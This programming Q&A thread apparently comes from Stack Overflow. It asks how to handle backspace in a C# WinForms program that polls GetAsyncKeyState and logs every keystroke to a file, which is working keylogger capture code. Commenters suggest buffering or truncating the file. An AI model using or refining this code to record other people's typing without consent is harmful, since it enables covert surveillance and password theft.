# Removing last character (backspace) when writing to a file in C#

Tags: c#, .net, winforms

### Problem

Good day, i made a program where you can record keystrokes. I included adding custom keys that should be printed out correctly such as: '**Shift + /**' will be '**?**'. But now i have one last problem involving the backspace, '**\b**'.

I'm using StreamWriter to write to a .log file. I also added the '**GetForegroundWindow**', but the problem lays in '**write("\b")**'.

```
                    int value = GetAsyncKeyState(i);
                    if ((value & 0x8000) == 0 || (value & 0x1) == 0)
                        continue;
                    key = (Keys)i;
                    switch (key)
                    {                           
                        case Keys.Shift:
                            write(" [" + key.ToString() + "] ");
                            break;
                        case Keys.Back:
                            write("\b");//     <----'WRITING' BACKSPACE TO THE FILE, EVERYTIME IT'S PRESSED.
                            break;
                        case Keys.Enter:
                            write("\n");
                            break;
                        case Keys.Space:
                            write(" ");
                            break;
                        case Keys.Tab:
                            write("\t");
                            break;
                        case Keys.Escape:
                            if (DEBUG)
                                return;

                        default:
                            IntPtr hWindowHandle = GetForegroundWindow();
                            uint dwProcessId;
                            uint dwThreadId = GetWindowThreadProcessId(hWindowHandle, out dwProcessId);
                            byte[] kState = new byte[256];
                            GetKeyboardState(kState);
                            uint HKL = GetKeyboardLayout(dwThreadId);
                            StringBuilder keyName = new StringBuilder();
                            ToUnicodeEx((uint)i, (uint)i, kState, keyName, 16, 0, HKL);
                            write(keyName.ToString());
                            break;
                    }
```

### Output

As i guessed, it will "write" a backspace to the file but not literally removing the last character or space from the file. The output of this will give a bunch of [][][]

[image: backspace using streamwriter]

But you can't "write" a backspace to the file can you? Is there any other way i can try and remove the last character from the file with the StreamWriter?

Comment: So, if someone types `<shift>flydog57<bs><bs>`, you want to record "Flydog" (with the two backspaces removing the last two characters).  Is that right?  Well, it's not going to do that for you auto-magically.  A backspace is just a character (ASCII 0x08, U+0008).  By convention, programs use that character to remove the last character in whatever buffer is being used.  That's something you get to write.  If you really want to do this, buffer your input and implement back-space-ability in the buffer.  Once you get beyond the back-space limit, write your buffer to the stream.

Comment: By the way, open Word.  Type `Now is the time for all good men to come to the aid of the party`.  Now press <Ctrl>+<BS> and notice that the last word was deleted (do it twice and two words disappear).  Now do the same thing in Notepad.  You get your skinny little vertical rectangle characters.  This is because no one ever implemented that code in Notepad

Comment: `using (var fs = new FileStream([FilePath], FileMode.Open, FileAccess.ReadWrite, FileShare.None)) { fs.SetLength(fs.Length - 1); }`. If, for same reason, the Encoding is UTF-16, you need to set `fs.Length - 2`.

Comment: What do you want to achieve? If you want actual text get characters removed, you may need to handle a cache and remove characters when backspace is pressed. If you just want the file display correctly, maybe loading it and remove characters while `\b` shows up.

Comment: @Flydog57 So does that mean, i would be able to see a removed character in a different text editing program? I opened up Sublime text and took that log file in, it would replace the [] as <0x01>

Comment: @LouisGo Actually i want the actual characters to get removed. But as of right now, i'm not sure if it's the problem with displaying it or if the writer can't actually write a backspace or remove the last char.

Comment: @TheNetplaitTeam Then you have to handle yourself before actually write. `\b` is a character, streamwriter just write it, not doing anything special. Backspace Keypress is translated into an action "remove" while editing, not when an editor loads the file.

Comment: What I'm talking about is writing the input "characters" not directly to a stream, but to a buffer.  If someone enters a backspace, you erase the last character in the buffer (be careful that they can't backspace beyond the beginning of your buffer).  At some point, you write some of your buffer to the stream.  For example, create 2 buffers each N chars long.  You type into the first (allowing backspaces).  When you get to the end of the 1st you put stuff into the 2nd.  When you get to the end of the 2nd, you write the 1st buffer to the file, and use the original 1st buffer as your next one.